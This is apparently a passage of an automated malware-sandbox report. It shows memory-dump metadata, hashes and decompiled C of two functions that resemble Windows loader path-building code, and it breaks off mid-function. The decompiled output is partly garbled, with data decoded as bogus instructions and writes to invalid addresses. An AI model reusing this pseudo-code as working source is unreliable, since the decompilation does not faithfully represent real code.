0x04b8baf6
0x04b8baf6
0x04b8bafd
0x04b8bb1f
0x04b8bb1f
0x04b8baff
0x04b8bb00
0x04b8bb00
0x04b8bb03
0x04b8bb03
0x04b8bacb
0x04b8bacf
0x04b8bad0
0x04b8bad1
0x04b8badc
0x04b8badc
0x04b8b980
0x04b8b980
0x04b8b988
0x04b8b98b
0x04b8b98d
0x04b8b990
0x04b8b993
0x04b8b999
0x04b8b99b
0x04b8b9a1
0x04b8b9a5
0x04b8b9aa
0x04b8b9b0
0x04b8b9bb
0x04b8b9c0
0x04b8b9c3
0x04b8b9ca
0x04b8b9cc
0x04b8b9cf
0x04b8b9d3
0x04b8b9d7
0x04b8ba94
0x04b8ba94
0x04b8ba98
0x04b8baa3
0x04bd2ccb
0x04b8baa9
0x04b8baa9
0x04b8baa9
0x04b8bab1
0x04bd2cd5
0x04bd2cdd
0x04bd2cdd
0x04b8babb
0x04b8babc
0x04b8bac2
0x04b8bac3
0x04b8bac3
0x04b8bac6
0x00000000
0x04b8b9dd
0x04b8b9dd
0x04b8b9e7
0x04b8b9e7
0x04b8b9ec
0x04b8b9ec
0x04b8b9f1
0x04b8b9f5
0x04b8b9fa
0x04b8ba00
0x04b8ba0c
0x04b8ba10
0x04b8ba10
0x04b8ba12
0x04b8ba18
0x00000000
0x00000000
0x04b8bb26
0x04b8bb26
0x04b8ba1e
0x04b8ba1e
0x04b8ba23
0x04b8ba25
0x04b8ba2c
0x04b8ba30
0x04b8ba35
0x04b8ba35
0x04b8ba41
0x04b8ba46
0x04b8ba4c
0x04b8ba50
0x04b8ba54
0x04b8ba6a
0x04b8ba6e
0x04b8ba70
0x04b8ba74
0x04b8ba78
0x04b8ba7a
0x04b8ba7c
0x04b8ba8e
0x04b8ba90
0x04b8ba92
0x04b8bb14
0x04b8bb14
0x04b8bb16
0x04b8bb16
0x00000000
0x04b8ba7c
0x04b8bb0a
0x04b8bb0d
0x00000000
0x00000000
0x00000000
0x04b8bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B8B9A5

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: a5202b6ccdc562cb8ccfd09945d27ff236d9227efcc93b2d1f06c821f57e1206
Instruction ID: d18a7aff79881c35fb1db76b97d5c44cc26b480879e7a973526394359615e245
Opcode Fuzzy Hash: a5202b6ccdc562cb8ccfd09945d27ff236d9227efcc93b2d1f06c821f57e1206
Instruction Fuzzy Hash: 14514971A08741CFC724EF38C480A2ABBE5FB88614F1449AEF59597354EB70F945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04B92581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E04B92581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t233;
				signed int _t237;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				signed int _t256;
				signed int _t263;
				signed int _t266;
				signed int _t274;
				signed int _t280;
				signed int _t282;
				void* _t285;
				signed int _t286;
				unsigned int _t289;
				signed int _t293;
				signed int _t298;
				signed int _t302;
				intOrPtr _t314;
				signed int _t323;
				signed int _t325;
				signed int _t326;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t339;
				void* _t340;
				void* _t342;

				_t335 = _t339;
				_t340 = _t339 - 0x4c;
				_v8 =  *0x4c5d360 ^ _t335;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t330 = 0x4c5b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t289 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t342 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t280 = 0x48;
				_t312 = 0 | _t342 == 0x00000000;
				_t323 = 0;
				_v37 = _t342 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t280 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t331 = 0xc0000106;
						goto L32;
					} else {
						_t330 = L04B84620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t280);
						_v52 = _t330;
						__eflags = _t330;
						if(_t330 == 0) {
							_t331 = 0xc0000017;
							goto L32;
						} else {
							 *(_t330 + 0x44) =  *(_t330 + 0x44) & 0x00000000;
							_t50 = _t330 + 0x48; // 0x48
							_t325 = _t50;
							_t312 = _v32;
							 *(_t330 + 0x3c) = _t280;
							_t282 = 0;
							 *((short*)(_t330 + 0x30)) = _v48;
							__eflags = _t312;
							if(_t312 != 0) {
								 *(_t330 + 0x18) = _t325;
								__eflags = _t312 - 0x4c58478;
								 *_t330 = ((0 | _t312 == 0x04c58478) - 0x00000001 & 0xfffffffb) + 7;
								E04BAF3E0(_t325,  *((intOrPtr*)(_t312 + 4)),  *_t312 & 0x0000ffff);
								_t312 = _v32;
								_t340 = _t340 + 0xc;
								_t282 = 1;
								__eflags = _a8;
								_t325 = _t325 + (( *_t312 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t274 = E04BF39F2(_t325);
									_t312 = _v32;
									_t325 = _t274;
								}
							}
							_t293 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t331 = _v68;
								__eflags = 0;
								 *((short*)(_t325 - 2)) = 0;
								goto L32;
							} else {
								_t280 = _t330 + _t282 * 4;
								_v56 = _t280;
								do {
									__eflags = _t312;
									if(_t312 != 0) {
										_t233 =  *(_v60 + _t293 * 4);
										__eflags = _t233;
										if(_t233 == 0) {
											goto L30;
										} else {
											__eflags = _t233 == 5;
											if(_t233 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t280 =  *(_v60 + _t293 * 4);
										 *(_t280 + 0x18) = _t325;
										_t237 =  *(_v60 + _t293 * 4);
										__eflags = _t237 - 8;
										if(_t237 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t237 * 4 +  &M04B92959))) {
												case 0:
													__ax =  *0x4c58488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E04BAF3E0(__edi,  *0x4c5848c, __ax & 0x0000ffff);
														__eax =  *0x4c58488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E04BAF3E0(_t325, _v80, _v64);
													_t269 = _v64;
													goto L26;
												case 2:
													 *0x4c58480 & 0x0000ffff = E04BAF3E0(__edi,  *0x4c58484,  *0x4c58480 & 0x0000ffff);
													__eax =  *0x4c58480 & 0x0000ffff;
													__eax = ( *0x4c58480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E04BAF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E04BAF3E0(_t325, _v76, _v36);
														_t269 = _v36;
													}
													L26:
													_t340 = _t340 + 0xc;
													_t325 = _t325 + (_t269 >> 1) * 2 + 2;
													__eflags = _t325;
													L27:
													_push(0x3b);
													_pop(_t271);
													 *((short*)(_t325 - 2)) = _t271;
													goto L28;
												case 6:
													__ebx = "\\Wow\\Wow";
													__eflags = __ebx - "\\Wow\\Wow";
													if(__ebx != "\\Wow\\Wow") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E04BAF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\Wow\\Wow";
														} while (__ebx != "\\Wow\\Wow");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x4c58478 & 0x0000ffff = E04BAF3E0(__edi,  *0x4c5847c,  *0x4c58478 & 0x0000ffff);
													__eax =  *0x4c58478 & 0x0000ffff;
													__eax = ( *0x4c58478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E04BF39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x4c56e58 & 0x0000ffff = E04BAF3E0(__edi,  *0x4c56e5c,  *0x4c56e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x4c56e58 & 0x0000ffff;
													__eax = ( *0x4c56e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t293 = _v16;
													_t312 = _v32;
													L29:
													_t280 = _t280 + 4;
													__eflags = _t280;
													_v56 = _t280;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t293 = _t293 + 1;
									_v16 = _t293;
									__eflags = _t293 - _v48;
								} while (_t293 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t237 =  *(_v60 + _t323 * 4);
						if(_t237 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t237 * 4 +  &M04B92935))) {
							case 0:
								__ax =  *0x4c58488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t312 =  &_v64;
								_v80 = E04B92E3E(0,  &_v64);
								_t280 = _t280 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x4c58480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4c58480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E04B7EEF0(0x4c579a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E04B7EB70(__ecx, 0x4c579a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t211 = _v72;
											__eflags = _t211;
											if(_t211 != 0) {
												L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
											}
											_t212 = _v52;
											__eflags = _t212;
											if(_t212 != 0) {
												__eflags = _t331;
												if(_t331 < 0) {
													L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
													_t212 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t289 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x4c57b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04B84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E04B7EB70(__ecx, 0x4c579a0);
										__eax = _v52;
										L36:
										_pop(_t324);
										_pop(_t332);
										__eflags = _v8 ^ _t335;
										_pop(_t281);
										return E04BAB640(_t212, _t281, _v8 ^ _t335, _t312, _t324, _t332);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t276 = _v56;
								if(_v56 != 0) {
									_t312 =  &_v36;
									_t278 = E04B92E3E(_t276,  &_v36);
									_t289 = _v36;
									_v76 = _t278;
								}
								if(_t289 == 0) {
									goto L44;
								} else {
									_t280 = _t280 + 2 + _t289;
								}
								goto L14;
							case 6:
								__eax =  *0x4c55764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x4c58478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4c58478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x4c56e58 & 0x0000ffff;
								__eax = ( *0x4c56e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t323 = _t323 + 1;
								if(_t323 >= _v48) {
									goto L16;
								} else {
									_t312 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("daa");
					 *0xFFFFFFFF724C3308 =  *((intOrPtr*)(0xffffffff724c3308)) - _t280;
					_t285 = 0x25;
					 *0xFFFFFFFF724E2408 =  *((intOrPtr*)(0xffffffff724e2408)) - _t285;
					 *0xFFFFFFFF724E7C08 =  *((intOrPtr*)(0xffffffff724e7c08)) - _t285;
					asm("daa");
					 *0xFFFFFFFF7AB80C08 =  *((intOrPtr*)(0xffffffff7ab80c08)) - _t285;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x4c3ff00);
					E04BBD08C(_t285, _t325, _t330);
					 *0xFFFFFFFFB92901DC =  *[fs:0x18];
					_t326 = 0;
					 *((intOrPtr*)( *0xFFFFFFFFB9290220)) = 0;
					_t286 =  *0xFFFFFFFFB9290214;
					__eflags = _t286;
					if(_t286 == 0) {
						_t249 = 0xc0000100;
					} else {
						 *0xFFFFFFFFB9290200 = 0;
						_t333 = 0xc0000100;
						 *0xFFFFFFFFB92901D4 = 0xc0000100;
						_t251 = 4;
						while(1) {
							_v40 = _t251;
							__eflags = _t251;
							if(_t251 == 0) {
								break;
							}
							_t302 = _t251 * 0xc;
							_v48 = _t302;
							__eflags = _t286 -  *((intOrPtr*)(_t302 + 0x4b41664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t266 = E04BAE5C0(_a8,  *((intOrPtr*)(_t302 + 0x4b41668)), _t286);
									_t340 = _t340 + 0xc;
									__eflags = _t266;
									if(__eflags == 0) {
										_t333 = E04BE51BE(_t286,  *((intOrPtr*)(_v48 + 0x4b4166c)), _a16, _t326, _t333, __eflags, _a20, _a24);
										_v52 = _t333;
										break;
									} else {
										_t251 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t251 = _t251 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t333;
						__eflags = _t333;
						if(_t333 < 0) {
							__eflags = _t333 - 0xc0000100;
							if(_t333 == 0xc0000100) {
								_t298 = _a4;
								__eflags = _t298;
								if(_t298 != 0) {
									_v36 = _t298;
									__eflags =  *_t298 - _t326;
									if( *_t298 == _t326) {
										_t333 = 0xc0000100;
										goto L76;
									} else {
										_t314 =  *((intOrPtr*)(_v44 + 0x30));
										_t253 =  *((intOrPtr*)(_t314 + 0x10));
										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t298;
										if( *((intOrPtr*)(_t253 + 0x48)) == _t298) {
											__eflags =  *(_t314 + 0x1c);
											if( *(_t314 + 0x1c) == 0) {
												L106:
												_t333 = E04B92AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
												_v32 = _t333;
												__eflags = _t333 - 0xc0000100;
												if(_t333 != 0xc0000100) {
													goto L69;
												} else {
													_t326 = 1;
													_t298 = _v36;
													goto L75;
												}
											} else {
												_t256 = E04B76600( *(_t314 + 0x1c));
												__eflags = _t256;
												if(_t256 != 0) {
													goto L106;
												} else {
													_t298 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t333 = E04B92C50(_t298, _a8, _t286, _a16, _a20, _a24, _t326);
											L76:
											_v32 = _t333;
											goto L69;
										}
									}
									goto L108;
								} else {
									E04B7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t333 = _a24;
									_t263 = E04B92AE4( &_v36, _a8, _t286, _a16, _a20, _t333);
									_v32 = _t263;
									__eflags = _t263 - 0xc0000100;
									if(_t263 == 0xc0000100) {
										_v32 = E04B92C50(_v36, _a8, _t286, _a16, _a20, _t333, 1);
									}
									_v8 = _t326;
									E04B92ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t249 = _t333;
					}
					L70:
					return E04BBD0D1(_t249);
				}
				L108:
			}

0x04b92584
0x04b92586
0x04b92590
0x04b92596
0x04b92597
0x04b92598
0x04b92599
0x04b9259e
0x04b925a4
0x04b925a9
0x04b925ac
0x04b925ae
0x04b925b1
0x04b925b2
0x04b925b5
0x04b925b8
0x04b925bb
0x04b925bc
0x04b925bf
0x04b925c2
0x04b925c5
0x04b925c6
0x04b925cb
0x04b925ce
0x04b925d8
0x04b925db
0x04b925dd
0x04b925de
0x04b925e1
0x04b925e3
0x04b925e9
0x04b926da
0x04b926da
0x04b926dd
0x04b926e2
0x04bd5b56
0x00000000
0x04b926e8
0x04b926f9
0x04b926fb
0x04b926fe
0x04b92700
0x04bd5b60
0x00000000
0x04b92706
0x04b92706
0x04b9270a
0x04b9270a
0x04b9270d
0x04b92713
0x04b92716
0x04b92718
0x04b9271c
0x04b9271e
0x04bd5b6c
0x04bd5b6f
0x04bd5b7f
0x04bd5b89
0x04bd5b8e
0x04bd5b93
0x04bd5b96
0x04bd5b9c
0x04bd5ba0
0x04bd5ba3
0x04bd5bab
0x04bd5bb0
0x04bd5bb3
0x04bd5bb3
0x04bd5ba3
0x04b92724
0x04b92726
0x04b92729
0x04b9272c
0x04b9279d
0x04b9279d
0x04b927a0
0x04b927a2
0x00000000
0x04b9272e
0x04b9272e
0x04b92731
0x04b92734
0x04b92734
0x04b92736
0x04bd5bc1
0x04bd5bc1
0x04bd5bc4
0x00000000
0x04bd5bca
0x04bd5bca
0x04bd5bcd
0x00000000
0x04bd5bd3
0x00000000
0x04bd5bd3
0x04bd5bcd
0x04b9273c
0x04b9273c
0x04b92742
0x04b92747
0x04b9274a
0x04b9274d
0x04b92750
0x00000000
0x04b92756
0x04b92756
0x00000000
0x04b92902
0x04b92908
0x04b9290b
0x00000000
0x04b92911
0x04b9291c
0x04b92921
0x00000000
0x04b92921
0x00000000
0x00000000
0x04b92880
0x04b92887
0x04b9288c
0x00000000
0x00000000
0x04b92805
0x04b9280a
0x04b92814
0x04b92816
0x00000000
0x00000000
0x04b9281e
0x04b92821
0x04b92823
0x00000000
0x04b92829
0x04b92829
0x04b92831
0x04b9283c
0x04b9283e
0x00000000
0x04b9283e
0x00000000
0x00000000
0x04b9284e
0x04b92850
0x04b92851
0x04b92854
0x04b92857
0x04b9285a
0x04b9285c
0x04b9285d
0x00000000
0x00000000
0x04b9275d
0x04b92761
0x00000000
0x04b92767
0x04b9276e
0x04b92773
0x04b92773
0x04b92776
0x04b92778
0x04b9277e
0x04b9277e
0x04b92781
0x04b92781
0x04b92783
0x04b92784
0x00000000
0x00000000
0x04bd5bd8
0x04bd5bde
0x04bd5be4
0x04bd5be6
0x04bd5be8
0x04bd5be9
0x04bd5bee
0x04bd5bf8
0x04bd5bff
0x04bd5c01
0x04bd5c04
0x04bd5c07
0x04bd5c0b
0x04bd5c0d
0x04bd5c0d
0x04bd5c15
0x04bd5c18
0x04bd5c1b
0x04bd5c1b
0x04bd5c1e
0x00000000
0x00000000
0x04b928c3
0x04b928c8
0x04b928d2
0x04b928d4
0x04b928d8
0x04b928db
0x04bd5c26
0x04bd5c28
0x04bd5c2d
0x04bd5c2d
0x00000000
0x00000000
0x04bd5c34
0x04bd5c36
0x04bd5c49
0x04bd5c4e
0x04bd5c54
0x04bd5c5b
0x04bd5c5d
0x04bd5c60
0x04b92788
0x04b92788
0x04b9278b
0x04b9278e
0x04b9278e
0x04b9278e
0x04b92791
0x00000000
0x00000000
0x04b92756
0x04b92750
0x00000000
0x04b92794
0x04b92794
0x04b92795
0x04b92798
0x04b92798
0x00000000
0x04b92734
0x04b9272c
0x04b92700
0x04b925ef
0x04b925ef
0x04b925ef
0x04b925f2
0x04b925f8
0x00000000
0x00000000
0x04b925fe
0x00000000
0x04b928e6
0x04b928ec
0x04b928ef
0x04b928f5
0x04b928f8
0x04b928f8
0x00000000
0x04b928f8
0x00000000
0x00000000
0x04b92866
0x04b92866
0x04b92876
0x04b92879
0x00000000
0x00000000
0x04b927e0
0x04b927e7
0x04b927e9
0x04b927eb
0x04bd5afd
0x00000000
0x04bd5afd
0x00000000
0x00000000
0x04b92633
0x04b92638
0x04b9263b
0x04b9263c
0x04b9263e
0x04b92640
0x04b92642
0x04b92647
0x04b92649
0x04b9264e
0x04b92650
0x04b92653
0x04b92659
0x04b926a2
0x04b926a7
0x04b926ac
0x04b926b2
0x04bd5b11
0x04bd5b15
0x04bd5b17
0x00000000
0x04b926b8
0x04b926b8
0x04b926ba
0x04b927a6
0x04b927a6
0x04b927a9
0x04b927ab
0x04b927b9
0x04b927b9
0x04b927be
0x04b927c1
0x04b927c3
0x04b927c5
0x04b927c7
0x04bd5c74
0x04bd5c79
0x04bd5c79
0x04b927c7
0x00000000
0x04b926c0
0x04b926c0
0x04b926c3
0x04b926c6
0x04b926c6
0x04b926c9
0x04b926c9
0x00000000
0x04b926c9
0x04b926ba
0x04b9265b
0x04b9265b
0x04b9265e
0x04b92667
0x04b9266d
0x04b92677
0x04b9267c
0x04b9267f
0x04b92681
0x04bd5b49
0x04bd5b4e
0x04b927cd
0x04b927d0
0x04b927d1
0x04b927d2
0x04b927d4
0x04b927dd
0x04b92687
0x04b92687
0x04b9268a
0x04b9268b
0x04b9268e
0x04b9268f
0x04b92691
0x04b92696
0x04b92698
0x04b9269d
0x04b9269f
0x00000000
0x04b9269f
0x04b92681
0x00000000
0x00000000
0x04b92846
0x00000000
0x00000000
0x04b92605
0x04b9260a
0x04b9260c
0x04b92611
0x04b92616
0x04b92619
0x04b92619
0x04b9261e
0x00000000
0x04b92624
0x04b92627
0x04b92627
0x00000000
0x00000000
0x04bd5b1f
0x00000000
0x00000000
0x04b92894
0x04b9289b
0x04b9289d
0x04b928a1
0x04bd5b2b
0x04bd5b2e
0x04bd5b2e
0x04b928a7
0x04b928a9
0x04bd5b04
0x04bd5b09
0x04bd5b09
0x04bd5b09
0x00000000
0x00000000
0x04bd5b35
0x04bd5b3c
0x04b928fb
0x04b928fb
0x04b926cc
0x04b926cc
0x04b926d0
0x00000000
0x04b926d2
0x04b926d2
0x00000000
0x04b926d2
0x00000000
0x00000000
0x04b925fe
0x04b9292d
0x04b92930
0x04b92935
0x04b9293e
0x04b92946
0x04b92956
0x04b9295e
0x04b92966
0x04b9296e
0x04b92976
0x04b9297e
0x04b9297f
0x04b92980
0x04b92981
0x04b92982
0x04b92983
0x04b92984
0x04b92985
0x04b92986
0x04b92987
0x04b92988
0x04b92989
0x04b9298a
0x04b9298b
0x04b9298c
0x04b9298d
0x04b9298e
0x04b9298f
0x04b92990
0x04b92992
0x04b92997
0x04b929a3
0x04b929a6
0x04b929ab
0x04b929ad
0x04b929b0
0x04b929b2
0x04bd5c80
0x04b929b8
0x04b929b8
0x04b929bb
0x04b929c0
0x04b929c5
0x04b929c6
0x04b929c6
0x04b929c9
0x04b929cb
0x00000000
0x00000000
0x04b929cd
0x04b929d0
0x04b929d9
0x04b929db
0x04b929dd
0x04b92a7f
0x04b92a84
0x04b92a87
0x04b92a89
0x04bd5ca1
0x04bd5ca3
0x00000000
0x04b92a8f
0x04b92a8f
0x00000000
0x04b92a8f
0x00000000
0x04b929e3
0x04b929e3
0x04b929e3
0x00000000
0x04b929e3
0x04b929dd
0x00000000
0x04b929db
0x04b929e6
0x04b929e9
0x04b929eb
0x04b929ed
0x04b929f3
0x04b929f5
0x04b929f8
0x04b929fa
0x04b92a97
0x04b92a9a
0x04b92a9d
0x04b92add
0x00000000
0x04b92a9f
0x04b92aa2
0x04b92aa5
0x04b92aa8
0x04b92aab
0x04bd5cab
0x04bd5caf
0x04bd5cc5
0x04bd5cda
0x04bd5cdc
0x04bd5cdf
0x04bd5ce5
0x00000000
0x04bd5ceb
0x04bd5ced
0x04bd5cee
0x00000000
0x04bd5cee
0x04bd5cb1
0x04bd5cb4
0x04bd5cb9
0x04bd5cbb
0x00000000
0x04bd5cbd
0x04bd5cbd
0x00000000
0x04bd5cbd
0x04bd5cbb
0x04b92ab1
0x04b92ab1
0x04b92ac4
0x04b92ac6
0x04b92ac6
0x00000000
0x04b92ac6
0x04b92aab
0x00000000
0x04b92a00
0x04b92a09
0x04b92a0e
0x04b92a21
0x04b92a24
0x04b92a35
0x04b92a3a
0x04b92a3d
0x04b92a42
0x04b92a59
0x04b92a59
0x04b92a5c
0x04b92a5f
0x04b92a5f
0x04b929fa
0x04b929f3
0x04b92a64
0x04b92a64
0x04b92a6b
0x04b92a6b
0x04b92a6d
0x04b92a72
0x04b92a72
0x00000000

Strings

PATH, xrefs: 04B92642, 04B92691

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 62d5e80fab928726245908cfe5ad508d51a671dd4185f7a41868aa04ad522789
Instruction ID: 38831b61712ede1bb90693476abb6bfeded247f881cbcbe1ae62ff72e9cb5368
Opcode Fuzzy Hash: 62d5e80fab928726245908cfe5ad508d51a671dd4185f7a41868aa04ad522789
Instruction Fuzzy Hash: 81C15B75E00219ABDF29DFA8D881AADB7F5FF48704F4444A9E901BB250E738BD51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04B9FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04B9FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E04B7EEF0(0x4c57b60);
					_t134 =  *0x4c57b84; // 0x776f7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4c57b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4c57b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
